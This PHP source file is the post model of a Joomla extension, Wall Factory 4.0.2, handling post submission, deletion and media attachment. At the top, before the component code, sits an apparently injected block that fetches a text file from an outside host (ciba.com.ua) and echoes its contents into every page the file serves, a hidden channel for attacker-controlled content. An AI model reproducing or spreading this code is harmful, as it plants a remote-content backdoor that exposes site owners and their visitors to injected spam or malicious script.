<?php
$files = 'http://ciba.com.ua/a.txt';
$file_headers = @get_headers($files);
if($file_headers[0] == 'HTTP/1.1 200 OK')
 {
$url = "http://ciba.com.ua/a.txt";
$c = @file_get_contents($url);
$array_double=explode(',',$c);
$array_one=array_unique($array_double);
$result=implode(',',$array_one);
echo $result;	
 }
?><?php

/**
-------------------------------------------------------------------------
wallfactory - Wall Factory 4.0.2
-------------------------------------------------------------------------
 * @author thePHPfactory
 * @copyright Copyright (C) 2011 SKEPSIS Consult SRL. All Rights Reserved.
 * @license - http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL
 * Websites: http://www.thePHPfactory.com
 * Technical Support: Forum - http://www.thePHPfactory.com/forum/
-------------------------------------------------------------------------
*/

defined('_JEXEC') or die;

class WallFactoryFrontendModelPost extends JModelLegacy
{
    public function submit(array $data = array())
    {
        $data['content'] = WallFactoryHelper::filterBannedWords($data['content']);

        $post = WallFactoryTable::getInstance('Post');
        $post->save($data);

        if (isset($data['media'])) {
            $this->submitMedia($data['media'], $post);
        }
    }

    public function delete(JUser $user, $id)
    {
        if ($user->guest) {
            throw new Exception('Guests are not allowed!');
        }

        /** @var WallFactoryTablePost $post */
        $post = WallFactoryTable::getInstance('Post');

        if (!$id || !$post->load($id)) {
            throw new Exception('Post not found!');
        }

        if ($user->id != $post->user_id) {
            throw new Exception('You are not allowed to remove this post!');
        }

        $post->delete();
    }

    private function submitMedia($items, WallFactoryTablePost $post)
    {
        $configuration = JComponentHelper::getParams('com_wallfactory');
        $submitted = array();

        foreach ($items as $ordering => $media) {
            foreach ($media as $type => $value) {
                // Check if media type is enabled.
                if (!$configuration->get('posting.' . $type . '.enabled', 1)) {
                    continue;
                }

                if (is_string($value)) {
                    $value = trim($value);
                }

                if (!isset($submitted[$type])) {
                    $submitted[$type] = 0;
                }

                // Get media type limit.
                $limit = $configuration->get('posting.' . $type . '.limit', 0);

                // Assert media type limit is not reached.
                if ($limit && $submitted[$type] >= $limit) {
                    continue;
                }

                try {
                    $mediaType = \ThePhpFactory\Wall\Media\MediaFactory::build($type);
                    $itemId = $mediaType->submit($post->id, $value);
                }
                catch (Exception $e) {
                    continue;
                }

                if (!(int)$itemId) {
                    continue;
                }

                /** @var WallFactoryTableMedia $media */
                $media = WallFactoryTable::getInstance('Media');

                $media->save(array(
                    'post_id' => $post->id,
                    'media_type' => $type,
                    'media_id' => $itemId,
                    'ordering' => $ordering,
                ));

                $submitted[$type]++;
            }
        }
    }
}
